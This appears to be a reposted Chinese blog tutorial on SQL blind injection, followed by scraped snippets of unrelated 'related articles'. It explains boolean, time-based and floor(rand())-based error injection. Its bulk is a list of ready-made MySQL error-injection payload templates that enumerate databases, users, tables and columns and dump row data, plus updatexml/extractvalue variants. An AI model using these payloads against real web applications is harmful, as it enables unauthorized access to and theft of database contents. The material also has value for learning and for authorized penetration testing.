2. 程式人生 > >WEB安全番外第四篇--關於SQL盲註

WEB安全番外第四篇--關於SQL盲註

阿新 發佈:2018-02-11
否則 substr sch date inf 產生一個隨機數 無法 cti tex

一、SQL盲註:

看不到回顯的,無法從返回直接讀取到數據庫內容的對數據的猜解,屬於盲註。

二、第一種--基於布爾類型的盲註:

這種很簡單,最典型的例子,就是挖SQL註入的時候常用的:

1 ‘‘‘
2 http://www.localhost.com/sqlinjection?id=1‘%20and%20‘1‘=‘1
3 http://www.localhost.com/sqlinjection?id=1‘%20and%20‘1‘=‘2
4 ‘‘‘

實戰時。前面一個判斷是永真的時候,拼接一個判斷,例如【substring(database(),1,1)=‘a‘】

1 """
2 例如id=1,有正常回顯
3 那麽:

 
4 id = 1 and substring(database(),1,1)=‘a‘
5 如果後面對了,就有返回,不對就沒有,從而一個一個爆出來
6 """

三、第二種--基於時間類型的盲註:

1 """
2 select * from tablename where id=‘103‘ and if(substring(database(),1,1)=‘a‘,sleep(5),null)‘;
3 """

這裏如果猜解第一個字符成功,會sleep 5s 否則不會【if(expr1,result1,result2)#如果expr1成立 result1 否則 result2】

以上兩種詳細請參見:

WEB安全第四篇--與數據庫的親密接觸:SQL註入攻擊

四、第三種--特殊的錯誤註入(本次的重點):

0、這裏的報錯是指

1、floor報錯的

(1)公式:

1 """
2 ?id=2‘ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (核心語句) from information_schema.tables limit 0,1))x from information_schema.tables group by x )a)--+
3 """

(2)原理:

引用自reber的博客https://www.jianshu.com/p/8c2343705100

 1 """
 2 floor()是取整數
 3 rand()在0和1之間產生一個隨機數
 4 rand(0)*2將取0到2的隨機數
 5 floor(rand()*2)有兩條記錄就會報錯
 6 floor(rand(0)*2)記錄需為3條以上,且3條以上必報錯,返回的值是有規律的
 7 count(*)是用來統計結果的,相當於刷新一次結果
 8 group by在對數據進行分組時會先看看虛擬表裏有沒有這個值,沒有的話就插入,存在的話count(*)加1
 9 在使用group by時floor(rand(0)*2)會被執行一次,若虛表不存在記錄,插入虛表時會再執行一次,導致會使主鍵中存在重復-->報錯
10 """

五、payload-->爆破數據的語句:

1、database信息

#database count
‘ and(select 1 from(select+count(*),concat((select (select (select+concat(0x7e7e3a7e7e, count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+#database name
‘ and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

2、current DB信息

1 #current-database-name
2 +and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x7e7e3a7e7e,/**/(select/**/database()),/**/0x7e7e3a7e7e)))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+
3 #current

3、current USER信息

1 #current USER
2 +and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x7e7e3a7e7e,/**/(select/**/user()),/**/0x7e7e3a7e7e)))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+
3 #current

4、table 信息

1 #table count
2 +and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(/**/select/**/concat(0x7e7e3a7e7e,/**/count(table_name),/**/0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=%s))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+
3 #table name
4 +and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(/**/select/**/concat(0x7e7e3a7e7e,/**/table_name,/**/0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=%s/**/limit/**/%d,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+

5、column 信息

1 #column num
2 +and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e,count(column_name),0x7e7e3a7e7e) from information_schema.columns where table_name=%s and table_schema=%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
3 #column name
4 +and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e,column_name,0x7e7e3a7e7e) from information_schema.columns where table_name=%s and table_schema=%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

6、數據

1 #data
2 +and(select 1 from(select count(*),concat((select (select ( select concat(%s) from %s.%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

7、補充:僅針對32位有效的:

?id=2 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)--+
?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))--+

六、參考文獻:

http://wyb0.com/posts/injection-of-error-based/

WEB安全番外第四篇--關於SQL盲註

相關推薦

WEB安全--關於SQL

否則 substr sch date inf 產生一個隨機數 無法 cti tex 一、SQL盲註: 看不到回顯的,無法從返回直接讀取到數據庫內容的對數據的猜解,屬於盲註。 二、第一種--基於布爾類型的盲註: 這種很簡單,最典型的例子,就是挖SQL註入的時候常用的: 1

mysql--SQL邏輯查詢語句執行順序

l數據庫 分組操作 一定的 內容 isp 新建 處理 hid 表示 mysql第四篇--SQL邏輯查詢語句執行順序 一.SQL語句定義順序 SELECT DISTINCT <select_list> FROM <left_table> <jo

web前端入坑 你還在用 jQuery

                web前端入坑第四篇:你還在用 jQuery?大媽都這麼努力,我們有幾個人回家還看書的?再說這個話題之前,我們先來掃盲普及一下 【jquery】 到底是什麼以及它火爆將近十年的重要原因。【 重新認識 - Jquery 是什麼 】jQuery簡寫 jq ,漢語 雞 課 外 瑞,具

Web框架 - Django

執行指定 gin nag nbsp 表達 font con 展現 del 前言 Django是一個開放源代碼的Web應用框架,由Python寫成。它和J2EE一樣,采用了MVC的軟件設計模式,即模型M,視圖V和控制器C。 本文將講解DJang

:Spark SQL Catalyst源碼分析之TreeNode Library

pla where 並且 手冊 input bst node lec esc /** Spark SQL源碼分析系列文章*/ 前幾篇文章介紹了Spark SQL的Catalyst的核心運行流程、SqlParser,和Analyzer,本來打算直接寫Optimizer

SQL Server索引語法 <>

相同 alt 不能 之間 cto 事情 col 存儲 過程   從CREATE開始   通過顯式的CREATE INDEX命令   在創建約束時作為隱含的對象   隨約束創建的隱含索引   當向表中添加如下兩種約束之一時,就會創建隱含索引。   主鍵約

web前端【】CSS屬性操作

idt lba adding 人的 ... charset 平鋪 cit stat 一、文本屬性 1.text-align:cnter 文本居中2.line heigth 垂直居中 :行高,和高度對應3.設置圖片與文本的距離:vertical-align4.text-de

《11招玩轉網絡安全》之招:low級別的DVWA SQL

password nta 下載 測試 gin isp 圖像 default 下一步 以DVWA為例,進行手工註入,幫助讀者了解註入原理和過程。 1、啟動docker,並在終端中執行命令: docker ps -a docker start LocalDVWA doc

Shiro安全框架| Shiro自定義Realm進行認證授權

  SHiro自定義Realm 首先在resource下新建user.ini 1[users] 2jiuyue=12345,admin 3[roles] 4admin=user:delete,user:update 然後測試類下新建IniRealmTest測試類,跟前面不

基於.net搭建熱插拔式web框架(RazorEngine實現)

/// <summary>頁面幫助類 /// A simple helper demonstrating the @Html.Raw /// </summary> /// <typeparam name="T"></typeparam

vue餓了麼學習-web字型)

1.字型庫網站:icomoon 2.在官網點選右上角icomoon app按鈕, 新頁面找到import ICONS點選, 選擇自己所有的svg檔案確定上傳, 選中新增的全部小圖示, 然後點選右下角的crate font, 跳轉到新頁面以後,每一個圖示下面都會出

《11招玩轉網路安全》之招:low級別的DVWA SQL注入

以DVWA為例,進行手工注入,幫助讀者瞭解注入原理和過程。 1、啟動docker,並在終端中執行命令: docker ps -a docker start LocalDVWA docker ps 執行結果如圖4-19所示。 圖4-19  啟動DVWA 2、在

MySQL資料庫SQL優化:通過trace分析優化器如何選擇執行計劃

 MySQL5.6提供了對SQL的跟蹤trace,通過trace檔案能夠進一步瞭解為什麼優化器選擇A執行計劃而不是選擇B執行計劃,幫助我們更好地理解優化器行為。     使用方式:首先開啟trace,設定格式為JSON,設定trace最大能夠使用的記憶體大小,避免解析過程中

Web開發之-JSP學習總結-:自定義標籤總結

一、自定義標籤開發步驟—以高仿<c:if test=""></c:if>標籤為例 1、編寫一個普通的java類,繼承SimpleTagSupport類,叫標籤處理器類。並且覆蓋doTag方法 /** * 標籤處理器類 * 1)繼承

SpringBoot之旅-web開發

一、引言 有了自動配置,springboot使web開發變得簡單,這個在springboot之旅中的第一篇中就有體現,實際的開

SQL Server 列儲存索引 :實時運營資料分析

實時運營資料分析(real-time operational analytics )是指同時在同一張資料表上執行分析處理和業務處理。分析查詢主要是對海量資料執行聚合查詢,而事務主要是指對資料表進行少量資料的更新和查詢。 運營工作負載(Operational workload)是指對開展業務至關重要的

Docker實戰 | :Docker啟用TLS加密解決暴露2375埠引發的安全漏洞,被黑掉三臺雲主機的教訓總結

## 一. 前言 在之前的文章中 [IDEA整合Docker外掛實現一鍵自動打包部署微服務專案](https://www.cnblogs.com/haoxianrui/p/14088400.html),其中開放了伺服器2375埠監聽,此做法卻引發出來一個安全問題,在上篇文章評論也有好心的童鞋提示,但自己心存

【JAVA併發】執行緒安全

# 1、執行緒安全 多個執行緒對同一個共享變數進行讀寫操作時可能產生不可預見的結果,這就是執行緒安全問題。 執行緒安全的核心點就是共享變數,只有在共享變數的情況下才會有執行緒安全問題。這裡說的共享變數,是指多個執行緒都能訪問的變數,一般包括成員變數和靜態變數,方法內定義的區域性變數不屬於共享變數的範圍。

實例講解webpack的基本使用

load prefix fig 圖片 onf com 引用 下載 基本 這一篇來講解一下webpack的loader的使用,用webpack打包文件,css,img,icon等都需要下載安裝對應的loader文件,並且寫好配置項,才可以進行打包,廢話不多說,直接開始實戰。

RabbitMQ:Spring集成RabbitMQ

led ase don 才會 catch rabl try edt .get 前面幾篇講解了如何使用rabbitMq,這一篇主要講解spring集成rabbitmq。 首先引入配置文件org.springframework.amqp,如下 &l